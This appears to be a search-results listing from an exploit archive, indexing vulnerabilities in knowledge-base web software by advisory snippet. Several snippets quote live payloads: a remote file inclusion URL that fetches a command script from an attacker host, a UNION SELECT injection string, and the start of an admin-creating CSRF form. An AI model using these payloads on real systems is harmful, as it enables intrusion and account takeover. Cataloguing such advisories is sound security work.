11251 matches found
WSN Knowledge Base 1.2 index.php Multiple Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...
WSN Knowledge Base 1.2 memberlist.php id Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...
Aladdin Knowledge Systems eSafe Gateway 3.0 HTML tag Script-filtering Bypass Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2800/info eSafe Gateway is a security utility used for filtering internet content. It is possible to craft an html file that slips through eSafe Gateway's script filtering feature. eSafe Gateway will ignore scripting...
Aladdin Knowledge Systems eSafe Gateway 3.0 Unicode Script-filtering Bypass Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2801/info eSafe Gateway is a security utility used for filtering internet content. An html file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by simply encoding the SCRIPT ta...
Interspire Knowledge Manager 5 'callback.snipshot.php' Arbitrary File Creation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/38186/info Interspire Knowledge Manager is prone to a vulnerability that allows attackers to create arbitrary files on a vulnerable computer. An attacker may exploit this issue to create arbitrary files, which may then be...
Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability
No description provided by source. Title: Knowledge Base Mod for PHPbb = 2.0.2 remote file inclusion URL: http://www.phpbb2.de/dload.php?action=file&fileid=538 Dork: Powered by Knowledge Base Credits: Oo Exploit: /includes/kbconstants.php?modulerootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...
Knowledge Base Enterprise Edition 4.62.00 SQL Injection Vulnerability
No description provided by source...
Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
Tornado Knowledge Retrieval System 4.2 - 'p' Parameter Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/29626/info Tornado Knowledge Retrieval System is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script cod...
AJ Article Persistent XSS Vulnerability
No description provided by source. I'm Sid3^effects member from Inj3ct0r Team. Vendor URL: http://www.ajsquare.com/ Google Dork: Powered By: AJ Square Inc Author: Sid3^effects aKa HaRi special thanks to: r0073r...
Multiple WebmasterSite Products Remote Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30572/info Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data. Successfully exploiting this issue will all...
68kb Knowledge Base 1.0.0rc3 - Admin CSRF
No description provided by source. Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF Date: 2010-04-02 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip Version: v1.0.0rc3 html body onload=document.formsedit.submit form name=creat...
Interspire Knowledge Manager 5 'p' Parameter Directory Traversal Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/36541/info Interspire Knowledge Manager is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive...
WSN Knowledge Base 1.2 comments.php id Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...
Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF
No description provided by source. Exploit: Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF Author: b33f - http://www.fuzzysecurity.com/ OS: Tested on XP PRO SP3 Browser: IE 4.01, IE 5.01, I...
PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multi SQL Injection Vulnerabilities
No description provided by source...
68kb Knowledge Base Script 1.0.0rc2 Search - SQL Injection
No description provided by source. Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for: %'//UNION//ALL//SELECT//1,2,user,4,5,6,7,8,9,10,11,12,13,14,15 Don't use spaces in...
68KB 1.0.0rc4 - Remote File Include Vulnerability
No description provided by source. 68KB v1.0.0rc4 Remote File Include Vulnerability Vendor: http://68kb.com download: http://github.com/68designs/68KB/downloads Author: eidelweiss Contact:...
Iatek Knowledge Base 'content_by_cat.asp' - SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28376/info Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow
No description provided by source. Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow Vendor: Aladdin Knowledge Systems Version: activex2002 Tested on: Windows 2003 SP2 / IE 7 Download:...